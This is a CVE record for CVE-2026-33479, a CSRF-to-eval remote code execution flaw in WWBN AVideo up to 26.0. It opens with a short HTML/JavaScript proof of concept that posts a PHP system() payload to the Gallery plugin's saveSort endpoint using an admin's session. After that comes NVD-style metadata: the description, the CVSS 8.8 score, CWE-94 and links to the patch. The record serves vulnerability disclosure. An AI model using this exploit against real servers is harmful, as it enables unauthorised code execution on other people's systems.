CVE-2026-33479

<!-- Conceptual CSRF PoC for CVE-2026-33479 Target: WWBN AVideo <= 26.0 --> <html> <body> <script> // Attacker sends a request to the Gallery plugin endpoint // The 'sections' parameter is passed directly to eval() var payload = "system('id');"; var formData = new FormData(); formData.append('sections[]', payload); fetch('http://target-site/plugin/Gallery/saveSort.json.php', { method: 'POST', body: formData, credentials: 'include' // Sends the admin's session cookie }).then(response => console.log('Request sent')); </script> <p>CSRF Exploit Generated</p> </body> </html>

{"cve": {"id": "CVE-2026-33479", "sourceIdentifier": "[email protected]", "published": "2026-03-23T15:16:34.220", "lastModified": "2026-03-24T18:48:38.257", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the Gallery plugin's `saveSort.json.php` endpoint passes unsanitized user input from `$_REQUEST['sections']` array values directly into PHP's `eval()` function. While the endpoint is gated behind `User::isAdmin()`, it has no CSRF token validation. Combined with AVideo's explicit `SameSite=None` session cookie configuration, an attacker can exploit this via cross-site request forgery to achieve unauthenticated remote code execution — requiring only that an admin visits an attacker-controlled page. Commit 087dab8841f8bdb54be184105ef19b47c5698fcb contains a patch."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de video de código abierto. En versiones hasta la 26.0 inclusive, el plugin Gallery, en su endpoint 'saveSort.json.php', pasa entrada de usuario no saneada de los valores del array '$_REQUEST['sections']' directamente a la función 'eval()' de PHP. Aunque el endpoint está protegido por `User::isAdmin()`, no tiene validación de token CSRF. Combinado con la configuración explícita de la cookie de sesión `SameSite=None` de AVideo, un atacante puede explotar esto mediante falsificación de petición en sitios cruzados para lograr ejecución remota de código no autenticada — requiriendo solo que un administrador visite una página controlada por el atacante. El commit 087dab8841f8bdb54be184105ef19b47c5698fcb contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/087dab8841f8bdb54be184105ef19b47c5698fcb", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-xggw-g9pm-9qhh", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-xggw-g9pm-9qhh", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}